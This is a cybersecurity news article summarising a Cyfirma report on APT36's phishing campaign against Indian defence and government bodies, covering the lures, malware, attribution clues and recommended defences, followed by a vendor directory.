Pakistan’s Cyber Offensive: APT36 Targets Indian Defence

Uploaded on 2025-06-23 in TECHNOLOGY--Hackers, NEWS-Cybersecurity News, GOVERNMENT-National, FREE TO VIEW

A recent report by Cyfirma details a sophisticated phishing campaign orchestrated by the Pakistan-based Advanced Persistent Threat group APT36, also known as Transparent Tribe. Active since at least 2013, APT36 has honed its focus on Indian entities, particularly the defence sector, government agencies, and educational institutions.

The campaign, uncovered in June 2025, leverages social engineering and malicious payloads to infiltrate sensitive systems, exploiting India’s National Informatics Centre (NIC) credentials to gather intelligence.

This summary dissects the report’s findings, highlighting the tactics, implications, and broader geopolitical context.

A Deceptive Lure

APT36’s latest operation employs spear-phishing emails masquerading as official NIC correspondence. These emails, often themed around urgent policy updates or geopolitical events like the April 2025 Pahalgam terror attack, when Indian tourists in Kasmir were murdered, to entice recipients to open malicious attachments or click embedded links. The campaign uses decoy documents, such as PDFs titled “Action Points & Response by Govt Regarding Pahalgam Terror Attack.pdf,” which direct users to fake login portals mimicking Indian government domains like jkpolice.gov.in.

These portals harvest credentials from officials using @gov .in or @nic domains, enabling further network infiltration.

The group’s malware arsenal includes Crimson RAT, a remote access trojan for data exfiltration, and macro-enabled PowerPoint files (PPAM) that deploy payloads when opened. Analysis of a malicious PDF’s metadata reveals it was created on 23 October 2024, in Pakistan’s time zone, using a laptop from the Prime Minister’s Youth Laptop Scheme - a telling clue to the campaign’s origins.

The use of fake domains, such as email.gov.in.gov-in.mywire.org, hosted on IPs linked to Pakistani APT tactics, further solidifies attribution to APT36 with moderate confidence.

Evolving Tactics

APT36’s methods reflect a blend of persistence and innovation. The group exploits human vulnerabilities through carefully crafted social engineering rather than zero-day software flaws, maximising psychological impact by leveraging sensitive topics like Kashmir. Its use of cross-platform languages like Python, Golang, and Rust, alongside command-and-control channels on platforms like Telegram and Google Drive, demonstrates technical sophistication. The campaign also employs “ClickFix” tactics, instructing users to execute malicious PowerShell commands via the Windows Run dialogue, a method increasingly popular amongst cybercriminals for its ability to bypass traditional defences.

The report notes APT36’s focus on India’s defence and aerospace sectors, with previous campaigns targeting state-run contractors and military personnel. By impersonating legitimate entities and exploiting topical events, the group ensures high success rates in credential theft and malware deployment.

This campaign’s rapid response to the Pahalgam attack underscores APT36’s agility in capitalising on real-world incidents.

Geopolitical Undercurrents

The campaign is not merely a technical exploit but a facet of Pakistan’s broader cyber-espionage strategy against India. Amid strained bilateral relations, exacerbated by Kashmir tensions, APT36’s activities align with Islamabad’s interest in gathering strategic intelligence. The use of government-issued laptops suggests possible state sponsorship, though Cyfirma stops short of definitive attribution. India, meanwhile, faces mounting pressure to bolster its cybersecurity infrastructure, as repeated breaches expose vulnerabilities in its defence ecosystem.

The IMF’s October 2024 report, forecasting sluggish global growth, indirectly highlights the economic stakes: India’s defence modernisation, critical to countering such threats, competes with fiscal constraints. The NIC, a backbone of India’s e-governance, is a prime target, as compromised credentials could unlock access to sensitive national systems.

Countering the Threat

Cyfirma recommends robust defences: advanced email filtering to detect phishing, disabling macros by default, and regular simulation drills to train personnel. Integrating geopolitical threat intelligence into security operations could preempt such campaigns. India’s government must also address systemic gaps, such as outdated software and lax credential management, to deter future attacks.

A Persistent Menace

APT36’s campaign underscores the growing nexus of cyberwarfare and geopolitics. As Pakistan-based actors refine their tactics, India’s defence sector remains a vulnerable target.

Without decisive action - technical, organisational, and diplomatic - these digital incursions risk eroding national security. The stakes are high in this shadow war, where clicks can be as damaging as missiles.

Cyfirma  |    Cyfirma   |    IMF 

Image:  Ideogram

You Might Also Read: 

Cyber Threat Forecast Part 2 - India:

If you like this website and use the comprehensive 8,000-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible


 

 

« Police Shut Down A Criminal Malware Operation
Cybersecurity Has Become Britain's Top Defence Priority »

ManageEngine
CyberSecurity Jobsite
Check Point
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

Tines

Tines

The Tines security automation platform helps security teams automate manual tasks, making them more effective and efficient.

CYRIN

CYRIN

CYRIN® Cyber Range. Real Tools, Real Attacks, Real Scenarios. See why leading educational institutions and companies in the U.S. have begun to adopt the CYRIN® system.

TÜV SÜD Academy UK

TÜV SÜD Academy UK

TÜV SÜD offers expert-led cybersecurity training to help organisations safeguard their operations and data.

NordLayer

NordLayer

NordLayer is an adaptive network access security solution for modern businesses — from the world’s most trusted cybersecurity brand, Nord Security. 

International Association of Professional Security Consultants (IAPSC)

International Association of Professional Security Consultants (IAPSC)

Members of the IAPSC represent a unique group of respected, ethical and competent security consultants.

IOTA Foundation

IOTA Foundation

The IOTA Foundation is a non-profit R&D organisation focused on developing the next generation of protocols for the connected world.

Bluink

Bluink

Bluink specializes in identity and access management and customer identity verification, using your smartphone as a strong authenticator and secure identity store.

Styra

Styra

Styra allows companies to secure cloud environments and applications, including those built on the popular Kubernetes open-source cloud platform.

North European Cybersecurity Cluster (NECC)

North European Cybersecurity Cluster (NECC)

NECC promotes information security and cybersecurity-related cooperation and collaboration in the Northern European region in order to enhance integration into the European Digital Single Market.

DataFleets

DataFleets

DataFleets is a privacy-preserving data engine that unifies distributed data for rapid access, agile analytics, and automated compliance.

SIA Group

SIA Group

SIA Group, an Indra company, combines Consulting, Systems Integration and Managed Services in four specialized business areas: Information Security, Storage, IT Management and IT Mobility.

IMQ Group

IMQ Group

IMQ is one of Europe’s top players in the field of conformity assessment. We offer certification services to support all the major sectors of the manufacturing and service industries.

Cyber Security Partners (CSP)

Cyber Security Partners (CSP)

Cyber Security Partners specialise in the provision of Cyber Security Consultancy, Data Protection and Certification and Compliance services.

Artjoker

Artjoker

Artjoker is a full cycle software development partner specialized in Blockchain projects and smart contract development including full cycle information security of all projects.

Mutare

Mutare

For three decades, Mutare has been empowering organizations to re-imagine a better way to connect through our transformative voice security, digital voice and text messaging solutions.

Techmentum

Techmentum

At Techmentum, our mission is to utilize technology to help companies succeed. Our expertise includes fully managed IT services, cybersecurity, cloud, and custom technology solutions.

CyberFOX

CyberFOX

CyberFOX is a global cybersecurity solutions provider focused on identity access management (IAM) for managed service providers (MSPs) and IT professionals.

Stacklok

Stacklok

Stacklok are an Open Source first security company enabling safe Open Source Software consumption.

Resonance Security

Resonance Security

Resonance offers powerful cybersecurity aggregation software that makes protecting against full spectrum cybersecurity threats effortless no matter what your technical level, budget, or scope.

Boston Government Services (BGS)

Boston Government Services (BGS)

Boston Government Services is an engineering, technology, and security firm providing mission-focused solutions for the clean energy, nuclear, and federal programs markets.